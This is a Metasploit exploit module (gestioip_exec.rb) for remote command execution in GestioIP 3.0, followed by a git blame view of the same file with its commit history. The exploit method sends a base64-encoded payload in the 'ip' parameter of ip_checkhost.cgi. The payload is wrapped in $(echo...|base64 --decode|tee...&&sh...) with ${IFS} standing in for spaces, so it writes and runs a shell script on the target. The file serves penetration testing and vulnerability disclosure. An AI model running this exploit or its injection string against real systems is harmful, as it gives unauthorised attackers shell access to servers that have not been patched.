modules/exploits/multi/http/gestioip_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GestioIP Remote Command Execution',
      'Description'    => %q{
        This module exploits a command injection flaw to create a shell script
        on the filesystem and execute it. If GestioIP is configured to use no authentication,
        no password is required to exploit the vulnerability. Otherwise, an authenticated
        user is required to exploit.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bperry'  #Initial Discovery and metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch
          [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure
          [ 'URL', 'https://www.rapid7.com/blog/post/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]
        ],
      'Payload'        =>
        {
          'Space'       => 475, # not a lot of room
          'DisableNops' => true,
          'BadChars'    => "",
        },
      'Platform'        => [ 'unix' ],
      'Arch'            => ARCH_CMD,
      'Targets'         => [[ 'Automatic GestioIP 3.0', { }]],
      'Privileged'      => false,
      'DisclosureDate'  => '2013-10-04',
      'DefaultTarget'   => 0))

    register_options(
    [
      OptString.new('TARGETURI', [true, 'URI', '/gestioip/']),
      OptString.new('HttpUsername', [false, 'The username to auth as', 'gipadmin']),
      OptString.new('HttpPassword', [false, 'The password to auth with', nil])
    ])
  end

  def post_auth?
    true
  end

  def user
    datastore['HttpUsername']
  end

  def pass
    datastore['HttpPassword']
  end

  def use_auth
    !(pass.nil? or pass.empty?)
  end

  def exploit

    pay = Rex::Text.encode_base64(payload.encoded)
    file = Rex::Text.rand_text_alpha(8)

    options = {
      'uri' => normalize_uri(target_uri.path, "ip_checkhost.cgi"),
      'encode_params' => false,
      'vars_get' => {
          'ip' => "2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004",
          'hostname' => "fds",
          'client_id' => "1",
          'ip_version' => ""
      }
    }

    if use_auth
      options.merge!('authorization' => basic_auth(user,pass))
    end

    res = send_request_cgi(options)

    if res and res.code == 401
      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Please provide USERNAME and PASSOWRD")
    end

  end
end
add gestio ip module 2013-10-04 06:39:30 -07:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
add gestio ip module 2013-10-04 06:39:30 -07:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add gestio ip module 2013-10-04 06:39:30 -07:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'GestioIP Remote Command Execution',`
			`'Description' => %q{`
			`This module exploits a command injection flaw to create a shell script`
Imply authentication when a password is set 2013-10-04 09:54:04 -05:00			`on the filesystem and execute it. If GestioIP is configured to use no authentication,`
			`no password is required to exploit the vulnerability. Otherwise, an authenticated`
			`user is required to exploit.`
add gestio ip module 2013-10-04 06:39:30 -07:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'bperry' #Initial Discovery and metasploit module`
			`],`
			`'References' =>`
			`[`
Add references, correct disclosure date 2013-10-04 09:59:26 -05:00			`[ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch`
			`[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure`
fix URLs not resolving 2022-01-23 15:28:32 -05:00			`[ 'URL', 'https://www.rapid7.com/blog/post/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]`
add gestio ip module 2013-10-04 06:39:30 -07:00			`],`
			`'Payload' =>`
			`{`
			`'Space' => 475, # not a lot of room`
			`'DisableNops' => true,`
First set of fixes for gestioip_exec 2013-10-04 13:29:27 -05:00			`'BadChars' => "",`
add gestio ip module 2013-10-04 06:39:30 -07:00			`},`
First set of fixes for gestioip_exec 2013-10-04 13:29:27 -05:00			`'Platform' => [ 'unix' ],`
add gestio ip module 2013-10-04 06:39:30 -07:00			`'Arch' => ARCH_CMD,`
			`'Targets' => [[ 'Automatic GestioIP 3.0', { }]],`
			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2013-10-04',`
add gestio ip module 2013-10-04 06:39:30 -07:00			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
First set of fixes for gestioip_exec 2013-10-04 13:29:27 -05:00			`OptString.new('TARGETURI', [true, 'URI', '/gestioip/']),`
Missed the HTTPUSERNAME fix 2016-05-27 18:37:04 -05:00			`OptString.new('HttpUsername', [false, 'The username to auth as', 'gipadmin']),`
Correct casing - should be HttpUsername and HttpPassword 2016-05-27 18:31:54 -05:00			`OptString.new('HttpPassword', [false, 'The password to auth with', nil])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
add gestio ip module 2013-10-04 06:39:30 -07:00			`end`

Correct false negative post_auth? status 2018-08-09 23:34:03 -05:00			`def post_auth?`
			`true`
			`end`

add gestio ip module 2013-10-04 06:39:30 -07:00			`def user`
Missed the HTTPUSERNAME fix 2016-05-27 18:37:04 -05:00			`datastore['HttpUsername']`
add gestio ip module 2013-10-04 06:39:30 -07:00			`end`

			`def pass`
Correct casing - should be HttpUsername and HttpPassword 2016-05-27 18:31:54 -05:00			`datastore['HttpPassword']`
add gestio ip module 2013-10-04 06:39:30 -07:00			`end`

			`def use_auth`
Imply authentication when a password is set 2013-10-04 09:54:04 -05:00			`!(pass.nil? or pass.empty?)`
add gestio ip module 2013-10-04 06:39:30 -07:00			`end`

			`def exploit`
First set of fixes for gestioip_exec 2013-10-04 13:29:27 -05:00
			`pay = Rex::Text.encode_base64(payload.encoded)`
			`file = Rex::Text.rand_text_alpha(8)`

			`options = {`
			`'uri' => normalize_uri(target_uri.path, "ip_checkhost.cgi"),`
			`'encode_params' => false,`
			`'vars_get' => {`
			`'ip' => "2607:f0d0:$(echo${IFS}" + pay + "\|base64${IFS}--decode\|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004",`
			`'hostname' => "fds",`
			`'client_id' => "1",`
			`'ip_version' => ""`
			`}`
			`}`

add gestio ip module 2013-10-04 06:39:30 -07:00			`if use_auth`
First set of fixes for gestioip_exec 2013-10-04 13:29:27 -05:00			`options.merge!('authorization' => basic_auth(user,pass))`
			`end`

			`res = send_request_cgi(options)`

			`if res and res.code == 401`
			`fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Please provide USERNAME and PASSOWRD")`
add gestio ip module 2013-10-04 06:39:30 -07:00			`end`

			`end`
			`end`